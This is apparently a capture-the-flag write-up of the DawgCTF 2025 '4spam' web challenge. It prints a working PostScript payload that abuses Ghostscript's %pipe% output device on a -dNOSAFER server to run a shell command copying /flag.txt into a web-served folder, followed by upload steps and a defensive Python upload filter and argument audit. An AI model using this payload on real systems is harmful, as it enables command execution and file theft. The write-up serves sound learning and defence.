DawgCTF 2025 - 4spam

Published: April 22, 2025 | CTF: DawgCTF 2025
Tags: CTF, Web, Ghostscript

4spam (WEB)

Category: Web
Points: 200
Difficulty: Hard

4spam Challenge Description

This challenge involves exploiting a vulnerability in Ghostscript, a popular interpreter for PostScript and PDF files. The challenge website apparently allows users to upload images along with messages to a message board.

4spam Challenge Interface

Identifying the Vulnerability

After exploring the application, I noticed that when uploading files, the server was using Ghostscript to process them, likely to generate thumbnails or validate the uploads. Looking at the error messages, I identified a potential command injection vulnerability:

Ghostscript Error Message

The command is attempting to use Ghostscript (gs) to convert a PostScript file to PDF, but there's an error that reveals what appears to be an attempted command injection exploit. The key suspicious part is in the OutputFile parameter, which contains a pipe command that tries to:

  1. Read /flag.txt
  2. Redirect its contents to /var/www/html/uploads/flag.txt

This suggests a PostScript/Ghostscript vulnerability that allows command execution. The error message reveals the attempted exploit by showing the command in the operand stack.

Vulnerability Details:
- Using GPL Ghostscript version 10.05.0 (dated 2025-03-12)
- The exploit attempts to read a flag file and write it to a web-accessible location
- The command injection is happening through the -sOutputFile parameter
- This looks like a classic PostScript/Ghostscript sandbox escape exploit

Crafting the Exploit

Based on the vulnerability, I crafted a PostScript file that would exploit the -dNOSAFER flag to execute a shell command:

PostScript Exploit Code
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
mark /OutputFile (%pipe%cat /flag.txt > /var/www/html/uploads/flag.txt) currentdevice putdeviceprops
showpage

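This PostScript code relies on the server running Ghostscript with the -dNOSAFER flag. Setting OutputFile to a %pipe% target makes Ghostscript open its output as a pipe to the shell command cat /flag.txt > /var/www/html/uploads/flag.txt, which copies the flag to a file in the uploads directory.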

Converting to PDF and Uploading

Converting PostScript to PDF

Next, I converted this PostScript file to PDF using Ghostscript itself:

gs -sDEVICE=pdfwrite -o exploit.pdf exploit.ps

Uploading the Exploit and Accessing the Flag

  1. I went to the 4spam webpage
  2. Typed some text in the "Message" field (it's required)
  3. Chose my exploit.pdf file using the "Image (optional, max 5 MB)" field
  4. Clicked the "Post" button to submit

Uploading the Exploit PDF

After the upload was processed, the server executed my embedded command when it tried to process the PDF with Ghostscript. This created a file named flag.txt in the uploads directory.

Successfully Created File

Finally, I navigated to the uploaded flag file at http://4spam.umbccd.net/uploads/flag.txt:

Flag File Contents
FLAG: DawgCTF{h4ck3d_by_0pay_expl01t}

Key Learning: This challenge demonstrates the dangers of processing user-supplied files with powerful tools like Ghostscript without proper sandboxing. The -dNOSAFER flag in particular disables Ghostscript's SAFER restrictions and so allows command execution, which makes it a critical vulnerability when the interpreter is exposed to user input.
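A defender-side sketch of that lesson, added here and not part of the original write-up or the challenge's code: an upload gate that refuses anything a PostScript/PDF interpreter would run, an audit of a Ghostscript command line for the two settings seen in the error message, and a hardened invocation for cases where documents must still be rendered. The function names, the raster allow-list and the sample paths are assumptions made for illustration.

```python
import re

# Raster formats a message board needs (constructed allow-list, an assumption).
IMAGE_MAGIC = {b"\x89PNG\r\n\x1a\n": "png", b"\xff\xd8\xff": "jpeg",
               b"GIF87a": "gif", b"GIF89a": "gif"}
# Signatures of formats that end up in a PostScript/PDF interpreter.
INTERPRETED_MAGIC = (b"%!PS", b"%PDF-")
PIPE_DEVICE = re.compile(rb"%pipe%", re.IGNORECASE)


def classify_upload(data: bytes) -> str:
    """Return the image type for an allowed upload, else raise ValueError."""
    if PIPE_DEVICE.search(data):
        raise ValueError("references the %pipe% device")
    if any(sig in data[:1024] for sig in INTERPRETED_MAGIC):
        raise ValueError("PostScript/PDF content is not an image")
    for magic, kind in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return kind
    raise ValueError("unrecognised file type")


def audit_gs_argv(argv: list[str]) -> list[str]:
    """List the risky settings in a Ghostscript command line."""
    findings = []
    if "-dNOSAFER" in argv:
        findings.append("-dNOSAFER disables the file and pipe restrictions")
    for arg in argv:
        if arg.startswith("-sOutputFile="):
            target = arg.split("=", 1)[1]
            if target.startswith("|") or "%pipe%" in target.lower():
                findings.append("OutputFile is a pipe to a shell command")
    return findings


def hardened_gs_argv(src: str, dst: str) -> list[str]:
    """Build an argv list (run without a shell) from server-generated paths."""
    for path in (src, dst):
        if not path.startswith("/") or "%" in path or "|" in path:
            raise ValueError(f"unsafe path: {path!r}")
    return ["gs", "-dSAFER", "-dBATCH", "-dNOPAUSE", "-sDEVICE=png16m",
            "-r72", f"-sOutputFile={dst}", src]
```

The gate is a first filter only; the rendering step should still run as an unprivileged user with no write access to the web root.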